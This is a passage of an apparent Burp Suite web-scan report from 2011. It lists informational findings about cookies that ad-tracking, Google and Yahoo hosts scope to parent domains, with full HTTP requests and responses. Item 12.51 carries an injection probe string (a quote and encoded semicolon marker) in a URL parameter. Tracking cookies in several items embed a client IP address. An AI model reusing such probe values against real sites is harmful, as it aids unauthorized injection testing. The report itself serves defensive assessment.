Content-Length: 89
Server: Jetty(7.x.y-SNAPSHOT)

u=9127E54769D9F368FC8156526FB88F6559521056&s=9127E54769D9F368FC8156526FB88F6559521056&n=1

12.35. http://audience.visiblemeasures.com/u/getuid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://audience.visiblemeasures.com
Path:   /u/getuid/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /u/getuid/ HTTP/1.1
Host: audience.visiblemeasures.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056; sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:50 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV"
Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 22:03:50 GMT
Set-Cookie: sid=C5F474F2682AA8DAE8075A6889492B4928B445B7;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 22:33:50 GMT
Content-Type: text/plain
Content-Length: 89
Server: Jetty(7.x.y-SNAPSHOT)
Connection: close

u=9127E54769D9F368FC8156526FB88F6559521056&s=C5F474F2682AA8DAE8075A6889492B4928B445B7&n=1

12.36. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6036036&rn=439947884&c7=http%3A%2F%2Fcore.videoegg.com%2Feap%2F12368%2Fhtml%2Fjstags.html%3FCCID%3D0%26r%3D0.3821160274092108&c3=1&c9=http%3A%2F%2Fwww.tucows.com%2Fvideoegg%2Fad.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 03 Feb 2011 20:51:19 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 20:51:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.37. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035784&c3=0&c4=2331.7717.9237.23663&c5=4871&c6=f978e9b0-271c-47b8-9a97-caba692f0bb2&c10=11073.35211.76599&c15=&cj=1&rn=5575236558291927040 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 03 Feb 2011 21:59:56 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 21:59:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.38. http://blogsearch.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:24 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=e5ba792587b9871d:TM=1296765084:LM=1296765084:S=8-JSBOXTuXRcLcm5; expires=Sat, 02-Feb-2013 20:31:24 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

12.39. http://books.google.com/bkshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:04 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=f09ac1e2ccf2b58a:TM=1296765124:LM=1296765124:S=VHIb6cqmET3q7qwK; expires=Sat, 02-Feb-2013 20:32:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

12.40. http://books.google.com/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:57 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=6552b75bb12891c4:TM=1296765117:LM=1296765117:S=z2Yh1vRAeMtxN6LI; expires=Sat, 02-Feb-2013 20:31:57 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

12.41. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?pixid=99004680 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7CUZ^0^8191; smdmp=7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=7CUZ^0^0; ug=uosDj9Liw_xRTA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=7CUZ^0^8191; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: smdmp=7CVs:99004680^7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: adf=7CUZ^0^0; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=z3WgCNenmAIQt6DI6wM&amp;guid=ON&amp;script=0
Content-Type: text/html
Content-Length: 0
Date: Thu, 03 Feb 2011 19:03:58 GMT


12.42. http://buzz.yahoo.com/buzz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buzz.yahoo.com
Path:   /buzz

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /buzz HTTP/1.1
Host: buzz.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:35:40 GMT
Set-Cookie: B=fjoviv16km0sc&b=3&s=eo; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: of01e2=08556806c2aa36978721cfcb146d3d49; path=/; domain=buzz.yahoo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
Pragma: no-cache
Location: http://login.yahoo.com/?.pd=c%3DhYw09vWp2e4FXlpTB9bd0rU-&.src=ybz&.intl=us&.done=http%3A%2F%2Fbuzz.yahoo.com%2Fvote%2F
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83

<!-- fe13.buzz.re1.yahoo.com uncompressed/chunked Thu Feb 3 11:35:40 PST 2011 -->

12.43. http://c.redcated/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.redcated
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&RedC=c.msn.com&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redcated
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.msn.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&MUID=AD04D6F8B2FF44629973BD0674351135
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Tue, 23-Aug-2011 02:29:39 GMT; path=/;
Date: Fri, 04 Feb 2011 02:29:38 GMT
Content-Length: 0


12.44. http://clk.redcated/AVE/go/285974183/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /AVE/go/285974183/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AVE/go/285974183/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_PreRollCompanion
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296770644-3981256; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=5F36AEF5D4FB49DB9F81F864E31B34FC; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=c003d4d/243a7/110b9ea7/af02/4d4b2654; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Thu, 03 Feb 2011 22:04:03 GMT
Connection: close


12.45. http://clk.redcated/AVE/go/286182932/direct/01/]]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /AVE/go/286182932/direct/01/]]

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AVE/go/286182932/direct/01/]] HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_WonderPreRoll
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296770649-3995471; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=8EE4F442F1FB4932AD6D6003B4E01B9A; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bcab411/243a7/110ece14/af02/4d4b2659; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Thu, 03 Feb 2011 22:04:08 GMT
Connection: close


12.46. http://code.google.com/p/simplemodal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/simplemodal/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/simplemodal/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:04:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=a5a07ae786cc1296:TM=1296770658:LM=1296770658:S=yVxBuI2w2sM7RSeS; expires=Sat, 02-Feb-2013 22:04:18 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

12.47. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:08 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=cb6b836b6760c3ac:TM=1296765128:LM=1296765128:S=HgS2nFLrqCV4X1Jh; expires=Sat, 02-Feb-2013 20:32:08 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

12.48. http://core.insightexpressai.com/adServer/adServerESI.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adServer/adServerESI.aspx HTTP/1.1
Host: core.insightexpressai.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 18
Content-Type: text/html; charset=utf-8
Set-Cookie: DW=221e32e71296770758; expires=Wed, 29-Jan-2031 22:05:58 GMT; path=/; domain=insightexpressai.com
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Expires: Thu, 03 Feb 2011 22:05:58 GMT
Pragma: no-cache
Date: Thu, 03 Feb 2011 22:05:58 GMT
Connection: close
Cache-Control: no-store

//banner not found

12.49. http://developer.yahoo.com/yui/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.com
Path:   /yui/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yui/ HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:44 GMT
Set-Cookie: B=auto2ed6km1j0&b=3&s=j0; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 29638

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="descr
...[SNIP]...

12.50. http://developer.yahoo.com/yui/license.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.com
Path:   /yui/license.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yui/license.html HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:04:29 GMT
Set-Cookie: B=1pm748p6klrhd&b=3&s=dl; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 22172

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="descr
...[SNIP]...

12.51. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ip-adress.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 286
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:19 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:19 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842119.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 02:28:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 04 Feb 2011 17:55:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:55:19 GMT
Connection: close

_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ip-adress.com%2fwhois%2fsmartdevil.com44a08%27%253b28a34
...[SNIP]...

12.52. http://dt.scanscout.com/ssframework/dt/pt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dt.scanscout.com
Path:   /ssframework/dt/pt.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ssframework/dt/pt.png?trackcd=1288991585470 HTTP/1.1
Host: dt.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:44 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: behavioralSegments=29_110203|32_110203|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:44 GMT; Path=/
Content-Length: 101
Connection: close
Content-Type: image/png

.PNG
.
...IHDR.....................sRGB.........bKGD.............IDAT..c````......^.*:....IEND.B`.

12.53. http://edge.quantserve.com/quant.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.quantserve.com
Path:   /quant.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quant.js HTTP/1.1
Host: edge.quantserve.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
ETag: "18334:E0-1152220633-1296770771366"
Vary: Accept-Encoding
Last-Modified: Thu, 03-Feb-2011 22:06:11 GMT
Content-Type: application/x-javascript
